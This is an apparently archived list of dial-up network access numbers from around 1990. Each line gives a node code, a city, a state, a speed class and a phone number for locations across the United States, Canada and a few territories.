02744 # NEWARK NEW JERSEY HIGH 201/824-3044
02744 # UNION/NEWARK NEW JERSEY HIGH 201/824-3044
02745 # BATON ROUGE LOUISIANA MED 504/291-0967
02753 SAN ANTONIO TEXAS HIGH 512/225-8002
02754 AUSTIN TEXAS HIGH 512/444-3280
02760 # NEW CASTLE PENNSYLVANIA LOW 412/658-5056
02771 # WHEELING WEST VIRGINIA LOW 304/233-7676
03001 DALLAS TEXAS HIGH 214/638-8888
03026 MERIDEN CONNECTICUT LOW 203/634-9249
03026 MDLTOWN/MERIDEN CONNECTICUT LOW 203/634-9249
03031 AURORA ILLINOIS LOW 708/844-0700
03031 ST. CHRLES/AURORA ILLINOIS LOW 708/844-0700
03035 # SAN FRANCISCO CALIFORNIA WATS 800/###-#### 03036 SAN FRANCISCO CALIFORNIA HIGH 415/974-1300
03046 SANTO DOMINGO DOMINICAN RPBL INTL 809/685-6151
03051 + TULSA OKLAHOMA HIGH 918/585-8400
03100 JACKSONVILLE FLORIDA MED 904/721-8100
03106 MISHAWAKA/SOUTH B INDIANA MED 219/234-5005
03106 SOUTH BEND INDIANA MED 219/234-5005
03107 BOULDER CITY NEVADA MED 702/293-0300
03107 LAS VEGAS/BOLDER NEVADA MED 702/293-0300
03112 # MORGANTOWN WEST VIRGINIA LOW 304/292-3092
03112 # WESTOVER/MORGANTO WEST VIRGINIA LOW 304/292-3092 03114 # CANTON OHIO LOW 216/456-0840
03120 # VALLEJO CALIFORNIA LOW 707/644-1192
03121 # AUGUSTA/MARTINEZ GEORGIA LOW 404/855-0442
03121 # MARTINEZ GEORGIA LOW 404/855-0442
03122 HUNTSVILLE ALABAMA MED 205/882-3003
03123 # MEDFORD OREGON LOW 503/772-0831
03125 # WILKES BARRE PENNSYLVANIA LOW 717/826-8991
03127 CORPUS CHRISTI TEXAS MED 512/883-8050
03137 # BURNABY/VANCOUVER BRITSH COLUMBI CANH 604/683-7620
03137 # VANCOUVER BRITSH COLUMBI CANH 604/683-7620
03144 ST. JOSEPH MISSOURI LOW 816/232-1455
03151 CHICAGO ILLINOIS HIGH 312/922-4601
03152 CHICAGO ILLINOIS HIGH 312/922-4601
03154 # FRANKFORT KENTUCKY LOW 502/223-0724
03165 FT. LAUDERDALE FLORIDA MED 305/463-0882
03165 HOLLYWD/FT. LAUDR FLORIDA MED 305/463-0882
03165 POMPNO BCH/FT. LD FLORIDA MED 305/463-0882
03166 TULSA OKLAHOMA HIGH 918/585-2010
03167 # TULSA OKLAHOMA HIGH 918/585-2706
03204 BUTLER PENNSYLVANIA LOW 412/283-2286
03213 # COCOA FLORIDA LOW 407/639-3022
03213 # MELBOURNE/COCOA FLORIDA LOW 407/639-3022
03213 # MERRIT ISLE/COCOA FLORIDA LOW 407/639-3022
03224 # NORTH HAMPTON NEW HAMPSHIRE LOW 603/964-7779
03230 # INDEPENDENCE/MISS MISSOURI HIGH 913/384-5012
03230 # KANSAS CITY/MISSI MISSOURI HIGH 913/384-5012
03230 # KANSAS CITY/MISSI KANSAS HIGH 913/384-5012
03230 # MISSION KANSAS HIGH 913/384-5012
03230 # SHAWNEE/MISSION KANSAS HIGH 913/384-5012
03263 PHILADELPHIA PENNSYLVANIA HIGH 215/592-8309
03266 COLUMBIA SOUTH CAROLINA MED 803/254-7563
03300 SACRAMENTO CALIFORNIA HIGH 916/448-4300
03302 NEW BEDFORD MASSACHUSETTS LOW 508/999-4521
03307 # CHICO CALIFORNIA LOW 916/343-4401
03322 MAYAQUEZ PUERTO RICO INTL 800/462-4213
03322 PONCE PUERTO RICO INTL 800/462-4213
03324 # ANNISTON ALABAMA LOW 205/236-3342
03344 # BURTON MICHIGAN LOW 313/743-8350
03344 # FLINT/BURTON MICHIGAN LOW 313/743-8350
03356 WATERBURY CONNECTICUT LOW 203/755-5994
03377 # POUGHKEEPSIE NEW YORK LOW 914/473-0401
03401 CAMDEN/PENNSAUKEN NEW JERSEY LOW 609/665-5600
03401 CHERRY HILL/PENNS NEW JERSEY LOW 609/665-5600
03401 PENNSAUKEN NEW JERSEY LOW 609/665-5600
03405 # FORT MEYERS FLORIDA LOW 813/337-0006
03406 LONG BEACH CALIFORNIA MED 213/435-0900
03406 NORWALK/LONG BEAC CALIFORNIA MED 213/435-0900
03406 SAN PEDRO/LONG BE CALIFORNIA MED 213/435-0900
03407 ALHAMBRA CALIFORNIA MED 818/308-1800
03407 ARCADIA/ALHAMBRA CALIFORNIA MED 818/308-1800
03407 EL MONTE/ALHAMBRA CALIFORNIA MED 818/308-1800
03407 PASADENA/ALHAMBRA CALIFORNIA MED 818/308-1800
03410 BEVERLY HILLS/SHR CALIFORNIA MED 818/789-9002
03410 CANOGA PARK/SHRM CALIFORNIA MED 818/789-9002
03410 SAN FERNANDO/SHM CALIFORNIA MED 818/789-9002
03410 SHERMAN OAKS CALIFORNIA MED 818/789-9002
03410 VAN NUYS/SHERMAN CALIFORNIA MED 818/789-9002
03410 WEST L.A./SHRMN O CALIFORNIA MED 818/789-9002
03412 # SALINAS CALIFORNIA LOW 408/754-2206
03415 NEW HAVEN/NO. HAV CONNECTICUT MED 203/773-0082
03415 NORTH HAVEN CONNECTICUT MED 203/773-0082
03420 KNOXVILLE TENNESSEE MED 615/690-1543
03422 + VILLE ST. LAURENT QUEBEC CANL 514/748-8057
03437 # GREENSBORO NORTH CAROLINA MED 919/273-0332
03443 # DALLAS TEXAS HIGH 214/630-5516
03453 BIRMINGHAM ALABAMA HIGH 205/942-0297
03456 CLEARWATER FLORIDA MED 813/441-9017
03456 ST. PETERSBRG/CLR FLORIDA MED 813/441-9017
03461 # DES MOINES IOWA MED 515/277-9684
03471 # FLAGSTAFF ARIZONA LOW 602/774-3857
03505 SANTA CRUZ CALIFORNIA MED 408/475-0981
03511 # BLOOMFIELD CONNECTICUT HIGH 203/242-1986
03514 # TALLAHASSEE FLORIDA LOW 904/878-2267
03515 # PENSACOLA FLORIDA LOW 904/477-3344
03516 # KALAMAZOO MICHIGAN MED 616/388-2130
03521 # POCATELLO IDAHO LOW 208/233-2501
03522 STOCKTON CALIFORNIA LOW 209/467-0601
03523 + AUSTIN TEXAS LOW 512/448-4611
03530 # DETROIT MICHIGAN HIGH 313/963-3460
03532 DES MOINES IOWA MED 515/277-7752
03533 # BINGHAMPTON NEW YORK LOW 607/724-4351
03543 COLUMBUS OHIO HIGH 614/221-1862
03545 # MONTGOMERY ALABAMA LOW 205/265-4570
03546 MOBILE ALABAMA MED 205/343-8414
03547 # ENID OKLAHOMA LOW 405/242-0113
03566 TOLEDO OHIO MED 419/255-7790
03572 # INDEPENDENCE MISSOURI HIGH 913/384-5012
03572 # KANSAS CITY/MISSI MISSOURI HIGH 913/384-5012
03572 # KANSAS CITY/MISSI KANSAS HIGH 913/384-5012
03572 # MISSION KANSAS HIGH 913/384-5012
03572 # SHAWNEE/MISSION KANSAS HIGH 913/384-5012
03603 # COLORADO SPRINGS COLORADO MED 719/590-1003
03606 # BOYNTN BCH/WPALM FLORIDA MED 407/471-9310
03606 # WEST PALM BEACH FLORIDA MED 407/471-9310
03607 # SAVANNAH GEORGIA LOW 912/232-6751
03614 # MANKATO MINNESOTA LOW 507/387-7313
03615 # MEMPHIS TENNESSEE MED 901/527-8122
03623 # ERIE PENNSYLVANIA LOW 814/456-8501
03624 RALEIGH NORTH CAROLINA LOW 919/829-0536
03625 # MIAMI FLORIDA HIGH 305/599-2964
03630 # IDAHO FALLS IDAHO LOW 208/522-3624
03634 GREENVILLE SOUTH CAROLINA MED 803/271-9213
03643 HARRISBURG/LEMOYN PENNSYLVANIA MED 717/763-6481
03643 LEMOYNE PENNSYLVANIA MED 717/763-6481
03651 # GREEN BAY WISCONSIN LOW 414/432-3064
03652 # TRENTON NEW JERSEY LOW 609/394-1900
03653 # FT. WAYNE INDIANA LOW 219/422-2581
03654 # SOUTHFIELD MICHIGAN MED 313/424-8024
03656 # EVANSVILLE INDIANA LOW 812/464-8181
03657 # BAKERSFIELD CALIFORNIA LOW 805/325-0371
03661 # CHARLESTON WEST VIRGINIA LOW 304/345-9575
03662 # ALLENTOWN/BETHLEH PENNSYLVANIA MED 215/865-6978
03662 # BETHLEHEM PENNSYLVANIA MED 215/865-6978
03663 MESA/PHOENIX ARIZONA HIGH 602/258-4528
03663 PHOENIX ARIZONA HIGH 602/258-4528
03666 LANSING MICHIGAN MED 517/482-5721
03673 # CARSON CITY NEVADA MED 702/885-8411
03673 # RENO/CARSON CITY NEVADA MED 702/885-8411 03675 # WORCESTER MASSACHUSETTS LOW 508/791-9000
03677 # JOPLIN MISSOURI LOW 417/781-8718
03703 HEMPSTEAD NEW YORK MED 516/485-7422
03703 MINEOLA/HEMPSTEAD NEW YORK MED 516/485-7422
03704 NIAGARA FALLS NEW YORK LOW 716/285-2561
03705 ALBANY NEW YORK MED 518/458-8300
03705 SCHENECTADY/ALBAN NEW YORK MED 518/458-8300
03706 SAN FRANCISCO CALIFORNIA HIGH 415/974-1300
03720 # WINSTON-SALEM NORTH CAROLINA MED 919/765-1221
03725 LOS ALTOS/SAN JOS CALIFORNIA HIGH 408/432-0804
03725 SAN JOSE CALIFORNIA HIGH 408/432-0804
03725 SANTA CLARA/SAN J CALIFORNIA HIGH 408/432-0804
03725 SUNNYVALE/SAN JOS CALIFORNIA HIGH 408/432-0804
03726 # BILLINGS MONTANA LOW 406/252-4880
03731 # SHREVEPORT LOUISIANA LOW 318/688-5840
03737 + CLEARWATER FLORIDA MED 813/443-4515
03774 # PORT ANGELES WASHINGTON LOW 206/452-6800
03775 # NEWARK OHIO LOW 614/345-8953
04000 LONGWOOD/ORLANDO FLORIDA MED 407/841-0020
04000 ORLANDO FLORIDA MED 407/841-0020
04004 BELLEVUE/SEATTLE WASHINGTON HIGH 206/285-0109
04004 SEATTLE WASHINGTON HIGH 206/285-0109
04014 PLEASANTON CALIFORNIA LOW 415/462-2101
04020 # TACOMA WASHINGTON LOW 206/572-2026
04025 MORRISTOWN NEW JERSEY LOW 201/539-1222
04027 # KINGSTON MASSACHUSETTS LOW 617/585-7616
04040 # NEW LONDON CONNECTICUT LOW 203/444-7030
04040 # NORWICH/NEW LONDO CONNECTICUT LOW 203/444-7030
04044 DANBURY CONNECTICUT LOW 203/797-9539
04045 HUNTINGTON/MELVIL NEW YORK MED 516/420-1221
04045 MELVILLE NEW YORK MED 516/420-1221
04046 + COLTON CALIFORNIA MED 714/872-0394
04061 # TACOMA WASHINGTON LOW 206/572-2026
04063 + CLEVELAND OHIO LOW 216/696-0545
04064 # TAMPA FLORIDA MED 813/933-6210
04073 # PINE BLUFF ARKANSAS LOW 501/535-2629
04074 # STEUBENVILLE/WNTS OHIO LOW 614/266-2170
04074 # WINTERSVILLE OHIO LOW 614/266-2170
04075 # ALEXANDRIA/FAIRFA VIRGINIA HIGH 703/352-3136
04075 # ARLINGTON/FAIRFAX VIRGINIA HIGH 703/352-3136
04075 # BETHESDA MARYLAND HIGH 703/352-3136
04075 # FAIRFAX VIRGINIA HIGH 703/352-3136
04075 # WASHINGTON D.C. HIGH 703/352-3136
04076 # FAIRFAX VIRGINIA HIGH 703/352-3136
04100 TAMPA FLORIDA MED 813/932-7070
04107 # FRESNO CALIFORNIA LOW 209/442-4328
04111 # MISSOULA MONTANA LOW 406/721-8960
04114 # CEDAR FALLS IOWA LOW 319/236-9020
04114 # WATERLOO IOWA LOW 319/236-9020
04117 # GRAND RAPIDS MICHIGAN MED 616/459-2304
04121 # ROANOKE VIRGINIA LOW 703/344-2762
04122 # MANCHESTER NEW HAMPSHIRE LOW 603/623-0409
04126 RAHWAY NEW JERSEY LOW 201/396-8550
04142 # LONGWOOD/ORLANDO FLORIDA MED 407/841-0217
04142 # ORLANDO FLORIDA MED 407/841-0217
04153 # SANTA ROSA CALIFORNIA LOW 707/527-6180
04154 # OXNARD/PRT HUENE CALIFORNIA MED 805/985-7843
04154 # PORT HUENEME CALIFORNIA MED 805/985-7843
04154 # VENTURA/HUENEME CALIFORNIA MED 805/985-7843
04157 # TUCSON ARIZONA MED 602/297-2239
04161 # ELKHART INDIANA LOW 219/293-8860
04164 # LAKELAND FLORIDA LOW 813/858-6970
04164 # WINTERHAVEN/LAKEL FLORIDA LOW 813/858-6970
04165 LAKELAND FLORIDA LOW 813/858-6970
04165 WINTERHAVEN/LAKEL FLORIDA LOW 813/858-6970
04166 # TRENTON NEW JERSEY LOW 609/394-1900
04175 ALAMEDA/OAKLAND CALIFORNIA HIGH 415/430-2900
04175 BERKELEY/OAKLAND CALIFORNIA HIGH 415/430-2900
04175 HAYWARD/OAKLAND CALIFORNIA HIGH 415/430-2900
04175 OAKLAND CALIFORNIA HIGH 415/430-2900
04212 ALBUQUERQUE NEW MEXICO MED 505/242-8344
04220 # PORTLAND MAINE LOW 207/775-5971
04222 # YOUNGSTOWN OHIO LOW 216/759-8892
04223 PHILADELPHIA PENNSYLVANIA HIGH 215/592-8309
04225 # BENTON HARBOR MICHIGAN LOW 616/925-3134
04225 # ST. JOE/BENTON HR MICHIGAN LOW 616/925-3134
04232 # HUNTINGTON/MELVIL NEW YORK MED 516/420-4579
04232 # MELVILLE NEW YORK MED 516/420-4579
04236 # ANAHEIM/NEWPRT BE CALIFORNIA HIGH 714/852-8141
04236 # IRVINE/NEWPORT BE CALIFORNIA HIGH 714/852-8141
04236 # NEWPORT BEACH CALIFORNIA HIGH 714/852-8141
04236 # SANTA ANA/NEWPRT CALIFORNIA HIGH 714/852-8141
04252 # SPRINGFIELD OHIO LOW 513/325-0511
04253 # BOISE IDAHO LOW 208/345-5951
04255 # SAN LUIS OBISPO CALIFORNIA LOW 805/549-0770 04257 MEMPHIS TENNESSEE MED 901/527-8006
04262 # ESCONDIDO/VISTA CALIFORNIA MED 619/941-6700
04262 # VISTA CALIFORNIA MED 619/941-6700
04263 # COVINA/DIAMOND CALIFORNIA MED 714/860-0057
04263 # DIAMOND BAR CALIFORNIA MED 714/860-0057
04263 # ONTARIO/DIAMOND CALIFORNIA MED 714/860-0057
04263 # POMONA/DIAMOND B CALIFORNIA MED 714/860-0057
04263 # W.COVINA/DIAMOND CALIFORNIA MED 714/860-0057
04277 ARLINGTON/FORT WO TEXAS MED 817/877-3630
04277 FORT WORTH TEXAS MED 817/877-3630
04304 # BLOOMFIELD CONNECTICUT HIGH 203/242-1986
04304 # HARTFORD/BLOOMFLD CONNECTICUT HIGH 203/242-1986
04305 # DECATUR ILLINOIS LOW 217/425-8864
04311 SPRINGFIELD ILLINOIS MED 217/525-8025
04313 NORFOLK VIRGINIA MED 804/855-7751
04313 PORTSMOUTH/NORFOL VIRGINIA MED 804/855-7751
04313 VIRGINIA BCH/NORF VIRGINIA MED 804/855-7751
04316 MINNEAPOLIS MINNESOTA HIGH 612/333-2799
04316 ST. PAUL/MINNEAPO MINNESOTA HIGH 612/333-2799
04321 # MINNEAPOLIS MINNESOTA HIGH 612/332-4024 04321 # ST PAUL/MINNEAPO MINNESOTA HIGH 612/332-4024
04325 # HEMPSTEAD NEW YORK MED 516/481-0150
04327 # SALEM OREGON LOW 503/370-4314
04330 # LUBBOCK TEXAS LOW 806/797-0765
04334 # NASHVILLE TENNESSEE HIGH 615/889-5790
04340 # BROWNSVILLE TEXAS LOW 512/548-1331
04346 ALEXANDRIA/FAIRF VIRGINIA HIGH 703/691-8200
04346 ARLINGTON/FAIRFA VIRGINIA HIGH 703/691-8200
04346 BETHESDA VIRGINIA HIGH 703/691-8200
04346 FAIRFAX VIRGINIA HIGH 703/691-8200
04346 WASHINGTON D.C. HIGH 703/691-8200
04351 # ATLANTIC CITY NEW JERSEY LOW 609/345-4050
04353 # BEVERLY HILLS/SH CALIFORNIA MED 818/789-9557
04353 # CANOGA PARK/SHRM CALIFORNIA MED 818/789-9557
04353 # SAN FERNANDO/SHR CALIFORNIA MED 818/789-9557
04353 # SHERMAN OAKS CALIFORNIA MED 818/789-9557
04353 # VAN NUYS/SHERMAN CALIFORNIA MED 818/789-9557
04353 # WEST L.A./SHRMN O CALIFORNIA MED 818/789-9557
04354 # PASCAGOULA MISSISSIPPI LOW 601/769-0121
04360 SAN DIEGO CALIFORNIA HIGH 619/296-3370
04363 # LAWRENCE KANSAS LOW 913/843-4870
04372 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
04375 CONCORD NEW HAMPSHIRE LOW 603/228-4732
04406 ITHACA NEW YORK LOW 607/257-6601
04411 # BELMONT/REDWOOD C CALIFORNIA HIGH 415/361-8701
04411 # PALO ALTO/REDWD C CALIFORNIA HIGH 415/361-8701
04411 # REDWOOD CITY CALIFORNIA HIGH 415/361-8701
04415 # BIRMINGHAM ALABAMA HIGH 205/942-7898
04423 # CORPUS CHRISTI TEXAS MED 512/887-9621
04425 # MINNEAPOLIS MINNESOTA HIGH 612/332-4024
04425 # ST PAUL/MINNEAPOL MINNESOTA HIGH 612/332-4024
04430 NEWARK/WILMINGTON DELAWARE MED 302/652-2060
04430 WILMINGTON DELAWARE MED 302/652-2060
04440 # AUSTIN TEXAS HIGH 512/448-1096
04443 # COLUMBUS GEORGIA LOW 404/327-0597
04444 # COLUMBUS OHIO HIGH 614/221-1612
04447 # SALT LAKE UTAH HIGH 801/533-8152
04453 BELLEVUE/SEATTLE WASHINGTON HIGH 206/283-3677
04453 SEATTLE WASHINGTON HIGH 206/283-3677
04455 # DETROIT MICHIGAN HIGH 313/963-3460
04464 # SCRANTON PENNSYLVANIA LOW 717/348-0765
04466 # TEMPLE TEXAS LOW 817/773-0982
04467 # FREELAND MICHIGAN LOW 517/695-6751
04467 # MIDLAND/FREELAND MICHIGAN LOW 517/695-6751
04467 # SAGINAW/FREELAND MICHIGAN LOW 517/695-6751
04475 # SPRINGFIELD ILLINOIS MED 217/544-0312
04501 DETROIT MICHIGAN HIGH 313/962-2870
04504 # BURLINGAME/SO. S. CALIFORNIA LOW 415/588-3043
04504 # SAN MATEO/SOUTH S CALIFORNIA LOW 415/588-3043
04504 # SOUTH S.F. CALIFORNIA LOW 415/588-3043
04515 NEW YORK NEW YORK HIGH 212/943-4700
04516 NEW YORK NEW YORK HIGH 212/943-4700
04525 + COLUMBUS OHIO HIGH 614/224-0422
04530 CLEVELAND OHIO HIGH 216/241-0024
04542 # PLYMOUTH MICHIGAN MED 313/451-2400
04556 CONCORD/WALNUT C CALIFORNIA LOW 415/935-0370
04556 PACHECO/WALNUT CR CALIFORNIA LOW 415/935-0370
04556 PLEASNTHILL/WALNT CALIFORNIA LOW 415/935-0370
04556 WALNUT CREEK CALIFORNIA LOW 415/935-0370
04603 BELMONT/REDWOOD CALIFORNIA HIGH 415/366-1092
04603 PALO ALTO/REDWD CALIFORNIA HIGH 415/366-1092
04603 REDWOOD CITY CALIFORNIA HIGH 415/366-1092
04621 # JACKSON MISSISSIPPI LOW 601/355-9741
04650 INDEPENDENCE/MISS MISSOURI HIGH 913/384-1226
04650 KANSAS CITY/MISSI MISSOURI HIGH 913/384-1226
04650 KANSAS CITY/MISSI KANSAS HIGH 913/384-1226
04650 MISSION KANSAS HIGH 913/384-1226
04650 SHAWNEE/MISSION KANSAS HIGH 913/384-1226
04653 + MISSION KANSAS HIGH 913/384-0071
04653 + SHAWNEE/MISSION KANSAS HIGH 913/384-0071
04666 PITTSBURGH PENNSYLVANIA HIGH 412/642-6778
04667 # PITTSBURGH PENNSYLVANIA HIGH 412/642-2015
04671 # CLEVELAND OHIO HIGH 216/861-6709
04672 SYRACUSE NEW YORK MED 315/437-7111
04703 # BROOKFIELD WISCONSIN HIGH 414/785-0630
04703 # MILWAUKEE/BROOKF WISCONSIN HIGH 414/785-0630
04706 # BELLEVUE/SEATTLE WASHINGTON HIGH 206/281-7141
04706 # SEATTLE WASHINGTON HIGH 206/281-7141
04713 BOSTON MASSACHUSETTS HIGH 617/330-5107
04713 CAMBRIDGE/BOSTON MASSACHUSETTS HIGH 617/330-5107
04722 # REDDING CALIFORNIA LOW 916/241-4820
04751 # FARGO NORTH DAKOTA LOW 701/280-0210
04755 EL SEGUNDO CALIFORNIA MED 213/643-2907
04755 MAR VISTA/EL SEGU CALIFORNIA MED 213/643-2907
04755 MARINADELREY/EL S CALIFORNIA MED 213/643-2907
04755 SANTA MONICA/EL S CALIFORNIA MED 213/643-2907
04757 # WINDSOR ONTARIO CANL 519/977-7256
04764 BRIDGETON/HAZELWD MISSOURI HIGH 314/731-8002
04764 HAZELWOOD MISSOURI HIGH 314/731-8002
04764 ST. LOUIS/HAZELWO MISSOURI HIGH 314/731-8002
04765 # BRIDGETON/HAZELWO MISSOURI HIGH 314/731-8283
04765 # HAZELWOOD MISSOURI HIGH 314/731-8283
04765 # ST LOUIS/HAZELWOO MISSOURI HIGH 314/731-8283
04770 # OSHKOSH WISCONSIN LOW 414/235-7473
04771 # JACKSON TENNESSEE LOW 901/423-1244
05013 # RAPID CITY SOUTH DAKOTA LOW 605/341-4007
05017 # HELENA MONTANA LOW 406/443-0112
05021 # SIOUX CITY IOWA LOW 712/255-3834
05043 # JACKSONVILLE FLORIDA MED 904/721-8559
05044 # COLUMBIA MISSOURI LOW 314/874-2771
05046 # UPLAND CALIFORNIA LOW 714/985-1153
05063 # TRAVERSE CITY MICHIGAN LOW 616/947-0050
05100 # CINCINNATI OHIO HIGH 513/530-9021
05104 # BURLINGTON VERMONT LOW 802/864-5714
05147 # GULFPORT MISSISSIPPI LOW 601/868-2331
05151 # TWIN FALLS IDAHO LOW 208/734-0221
05206 WHITE PLAINS NEW YORK HIGH 914/328-7730
05211 # EATONTOWN/RED BAN NEW JERSEY LOW 201/758-0337
05211 # LONG BRANCH/RED B NEW JERSEY LOW 201/758-0337
05211 # RED BANK NEW JERSEY LOW 201/758-0337
05221 # FLORENCE ALABAMA LOW 205/760-0030
05241 INGLEWOOD/VERNON CALIFORNIA HIGH 213/587-0030
05241 LOS ANGELES/VERNO CALIFORNIA HIGH 213/587-0030
05241 VERNON CALIFORNIA HIGH 213/587-0030
05242 INGLEWOOD/VERNON CALIFORNIA HIGH 213/587-0030
05242 LOS ANGELES/VERNO CALIFORNIA HIGH 213/587-0030
05242 VERNON CALIFORNIA HIGH 213/587-0030
05253 # CLARKESVILLE TENNESSEE LOW 615/645-8877
05256 # DURHAM NEW HAMPSHIRE LOW 603/868-1502
05260 SPOKANE WASHINGTON MED 509/624-1549
05264 # ROCKY MOUNT NORTH CAROLINA LOW 919/937-4828
05275 # ALEXANDRIA LOUISIANA LOW 318/445-2694
05276 # LAKE CHARLES LOUISIANA LOW 318/494-1991
05277 # PHILADELPHIA PENNSYLVANIA HIGH 215/592-8750
05302 # VICKSBURG MISSISSIPPI LOW 601/638-1551
05304 # FORT PIERCE FLORIDA LOW 407/466-5661
05307 # PEORIA ILLINOIS LOW 309/637-5961
05325 # COLTON/RIVERSIDE CALIFORNIA MED 714/422-0222
05325 # RIVERSIDE CALIFORNIA MED 714/422-0222
05325 # SAN BERNADINO/RIV CALIFORNIA MED 714/422-0222
05341 # ALAMEDA/OAKLAND CALIFORNIA HIGH 415/633-1896
05341 # BERKELEY/OAKLAND CALIFORNIA HIGH 415/633-1896
05341 # HAYWARD/OAKLAND CALIFORNIA HIGH 415/633-1896
05341 # OAKLAND CALIFORNIA HIGH 415/633-1896
05350 # ANTIOCH CALIFORNIA LOW 415/754-8222
05362 # CONCORD/WALNUT CR CALIFORNIA MED 415/935-1507
05362 # PACHECO/WALNUT CR CALIFORNIA MED 415/935-1507
05362 # PLEASNTHILL/WALNT CALIFORNIA MED 415/935-1507
05362 # WALNUT CREEK CALIFORNIA MED 415/935-1507
05365 # WAUSAU WISCONSIN LOW 715/848-6171
05366 PONTIAC MICHIGAN LOW 313/338-8384
05373 # NEW YORK NEW YORK HIGH 212/809-9660
05415 # WICHITA FALLS TEXAS LOW 817/723-2386
05431 # OPELIKA ALABAMA LOW 205/742-9040
05437 # BLOOMINGTON ILLINOIS LOW 309/827-2748
05441 WICHITA KANSAS MED 316/681-0832
05443 # WICHITA KANSAS MED 316/681-2719
05456 # PATERSON NEW JERSEY MED 201/742-0752
05456 # RIDGEWOOD/PATERSO NEW JERSEY MED 201/742-0752
05456 # WAYNE/PATERSON NEW JERSEY MED 201/742-0752
05464 BROCKTON/RANDOLPH MASSACHUSETTS LOW 617/986-0500
05464 RANDOLPH MASSACHUSETTS LOW 617/986-0500
05500 # AURORA/DENVER COLORADO HIGH 303/832-3447
05500 # BOULDER/DENVER COLORADO HIGH 303/832-3447
05500 # DENVER COLORADO HIGH 303/832-3447
05502 # JEFFERSON CITY MISSOURI LOW 314/634-8296
05503 # MCALLEN TEXAS LOW 512/631-6101
05504 # COEUR D’ALENE IDAHO LOW 208/765-1465
05514 # LONGVIEW WASHINGTON LOW 206/423-9072
05520 # LOUISVILLE KENTUCKY MED 502/499-9825
05523 NASHVILLE TENNESSEE HIGH 615/885-3530
05524 # PAWTUCKET/PROVDEN RHODE ISLAND HIGH 401/274-7380
05524 # PROVIDENCE RHODE ISLAND HIGH 401/274-7380
05524 # WARWICK/PROVIDENC RHODE ISLAND HIGH 401/274-7380
05526 # ALTOONA PENNSYLVANIA LOW 814/943-5848
05531 OCALA FLORIDA LOW 904/351-0305
05537 # COATESVILLE PENNSYLVANIA LOW 215/383-0440
05537 # DOWNINGTON/COATSV PENNSYLVANIA LOW 215/383-0440
05544 BROOKFIELD WISCONSIN HIGH 414/796-1087
05550 # BREMERTON WASHINGTON LOW 206/377-2792
05551 # LAKE BLUFF ILLINOIS LOW 708/295-7075
05551 # LIBRTYVLE/LAKE BL ILLINOIS LOW 708/295-7075 05552 # LAKE BLUFF ILLINOIS LOW 708/295-7075
05552 # LIBRTYVLE/LAKE BL ILLINOIS LOW 708/295-7075
05553 # BALTIMORE MARYLAND HIGH 301/528-9296
05554 # BALTIMORE MARYLAND HIGH 301/528-9296
05603 # YUMA ARIZONA LOW 602/343-9000
05605 ROCKFORD ILLINOIS MED 815/654-1900
05626 GALVESTON TEXAS LOW 409/762-8053
05626 TEXAS CITY/GALVES TEXAS LOW 409/762-8053
05627 # ELIZABETH/NEWARK NEW JERSEY HIGH 201/824-3044
05627 # JERSEY CITY/NEWRK NEW JERSEY HIGH 201/824-3044
05627 # NEWARK NEW JERSEY HIGH 201/824-3044
05627 # UNION/NEWARK NEW JERSEY HIGH 210/824-3044
05646 # SAN DIEGO CALIFORNIA HIGH 619/296-8747
05650 # CENTEREACH/LK GRV NEW YORK MED 516/471-6080
05650 # LAKE GROVE NEW YORK MED 516/471-6080
05650 # RONKONKOMA/LK GRV NEW YORK MED 516/471-6080
05671 # AMES IOWA LOW 515/232-0157
05672 + INDIANAPOLIS INDIANA HIGH 317/687-0305
05710 # SIOUX FALLS SOUTH DAKOTA LOW 605/334-0085
05715 # BRIDGETON/HAZELWO MISSOURI HIGH 314/731-8283 05715 # HAZELWOOD MISSOURI HIGH 314/731-8283
05715 # ST LOUIS/HAZELWD MISSOURI HIGH 314/731-8283
05716 # MANHATTAN KANSAS LOW 913/776-9803
05717 BRIDGETON/HAZELWD MISSOURI HIGH 314/731-0703
05717 HAZELWOOD MISSOURI HIGH 314/731-0703
05717 ST. LOUIS/HAZELWD MISSOURI HIGH 314/731-0703
05733 GAINESVILLE FLORIDA LOW 904/335-0544
05734 # BRYAN TEXAS LOW 409/823-1090
05734 # CLG STATN/BRYAN TEXAS LOW 409/823-1090
05763 # PHOENIX ARIZONA HIGH 602/258-0554
05763 # PHOENIX ARIZONA HIGH 602/258-0554
05773 # TORONTO ONTARIO CANH 416/365-7630
05774 # LEXINGTON KENTUCKY MED 606/266-7063
06003 # TORONTO ONTARIO CANH 416/365-7630
06014 ROSEVILLE MICHIGAN LOW 313/774-1000
06022 # SANTA MARIA CALIFORNIA LOW 805/922-3308
06035 ENGLEWOOD CLIFFS NEW JERSEY MED 201/567-9841
06035 FAIR LAWN/ENGLWD NEW JERSEY MED 201/567-9841
06037 # ENGLEWOOD CLIFFS NEW JERSEY MED 201/567-8951
06046 # PULLMAN WASHINGTON LOW 509/332-3760
06056 SAIPAN SAIPAN INTL 671/234-1121
06056 SAIPAN GUAM INTL 670/234-1121
06105 CHARLOTTE NORTH CAROLINA HIGH 704/377-0521
06106 OMAHA NEBRASKA MED 402/393-0903
06130 # MACON/WARNER ROBI GEORGIA LOW 912/923-7590
06130 # WARNER ROBINS GEORGIA LOW 912/923-7590
06147 # VISALIA CALIFORNIA LOW 209/625-4891
06151 # CINCINNATI OHIO HIGH 513/530-9021
06221 # LARAMIE WYOMING LOW 307/742-9441
06225 + SAN ANTONIO TEXAS HIGH 512-225-3213
06242 # FREDERICK/MYERSVI MARYLAND LOW 301/293-9504
06242 # HAGERSTOWN/MYERSV MARYLAND LOW 301/293-9504
06242 # MYERSVILLE MARYLAND LOW 301/293-9504
06256 ALEXANDRIA/FAIRFA VIRGINIA HIGH 703/385-7587
06256 ARLINGTON/FAIRFAX VIRGINIA HIGH 703/385-7587
06256 BETHESDA MARYLAND HIGH 703/385-7587
06256 FAIRFAX VIRGINIA HIGH 703/385-7587
06256 WASHINGTON D.C. HIGH 703/385-7587
06301 + REDWOOD CITY CALIFORNIA LOW 415/367-0334
06305 # FAYETTEVILLE ARKANSAS LOW 501/442-0234
06321 # CHICAGO ILLINOIS HIGH 312/922-6571
06324 CHICAGO ILLINOIS HIGH 312/427-7579
06325 # CHICAGO ILLINOIS HIGH 312/922-6571
06341 # FAYETTEVILLE NORTH CAROLINA LOW 919/486-0103
06342 # UTICA NEW YORK LOW 315/797-7001
06343 SPARTANBURG SOUTH CAROLINA LOW 803/585-0016
06346 # PORT ST. LUCIE FLORIDA LOW 407/337-1992
06347 # NEW CITY NEW YORK LOW 914/634-0388
06350 # NEDERLAND TEXAS LOG 409/721-3400
